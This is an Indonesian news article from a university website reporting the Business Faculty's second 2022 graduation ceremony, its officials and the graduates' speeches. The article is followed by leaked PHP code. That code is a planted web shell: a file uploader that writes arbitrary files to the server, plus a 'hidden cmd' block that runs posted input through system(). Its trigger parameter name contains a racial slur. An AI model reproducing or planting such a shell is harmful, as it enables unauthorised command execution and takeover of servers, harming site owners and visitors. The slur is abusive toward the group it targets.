#

Fakultas Bisnis IBT Pelita Indonesia Kembali Gelar Yudisium Tahap 2 Tahun 2022

Setelah sukses menggelar Yudisium Tahap 1 pada bulan April kemarin, Fakultas Bisnis Institut Bisnis dan Teknologi (IBT) Pelita Indonesia kembali melaksanakan Yudisium tahap 2 untuk 80 lulusannya, yang terdiri dari 42 lulusan program studi manajemen, dan 38 lulusan dari program studi akuntansi. Adapun pelaksanaan Yudisium tahap 2 tersebut dilaksanakan pada hari Kamis (19/05/2022), bertempat di Aula Lantai 5 Kampus 2 IBT Pelita Indonesia yamg beralamat di Jalan Srikandi dan dihadiri secara langsung oleh seluruh lulusan.

Penyematan gelar Sarjana Ekonomi kepada seluruh lulusan melalui kegiatan Yudisium ini dihadiri langsung oleh Wakil Rektor I, Bapak Prof. Teddy Chandra, S.E., M.M., Wakil Rektor II, Bapak Dr. Ir. Harry P. Panjaitan, M.M., Ketua Yayasan Pelita Indonesia Bapak Drs. Harry Choandra, Dekan Fakultas Bisnis, Ibu Dr. Layla Hafni, S.E., M.M., serta seluruh unsur pejabat struktural di Fakultas Bisnis IBT Pelita Indonesia. Pada kesempatan ini, Prof. Teddy Chandra, S.E., M.M. diberi kesempatan untuk menyampaikan pesan-pesan akademik yang dapat dijadikan motivasi bagi para lulusan dalam meniti karirnya ke depan.

Kemudian acara dilanjutkan dengan penyampaian kesan-kesan dari perwakilan para lulusan. Terdapat tiga nama lulusan yang didampak sebagai perwakilan para lulusan, yaitu Merlinda Simanjuntak, Wilbert Sentosa, dan Jurdil Anwar. Dari kesan-kesan ketiga lulusan tersebut tergambar rasa kepuasan mereka terhadap seluruh layanan yang diberikan oleh pihak kampus selama mereka mengikuti perkuliahan di IBT Pelita Indonesia. Lebih lanjut salah satu dari mereka menyampaikan bahwa sedikit rasa kecewanya dikarenakan tidak sempat mengikuti perkuliahan di kampus baru IBT Pelita Indonesia, yang dikarenakan pembangunan Kampus 2 ini selesai disaat pandemi sedang berlangsung dan seluruh kuliah dilakukan secara daring.

The Best Institute in Pekanbaru Riau

"; echo "

Uploader

"; echo "".php_uname()." "; echo "
"; echo "
"; if($_POST["k"]==upload) { if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){ echo"".$_FILES["f"]["name"]; }else{ echo"Upload Fail";}}} //hidden cmd if(isset($_REQUEST['shellnigga2099X'])){ echo "
";
echo "

CMD

"; echo "".php_uname()." "; echo " "; $shellnigga2099X = ($_POST['coba']); system($shellnigga2099X); echo "
"; die; } ?>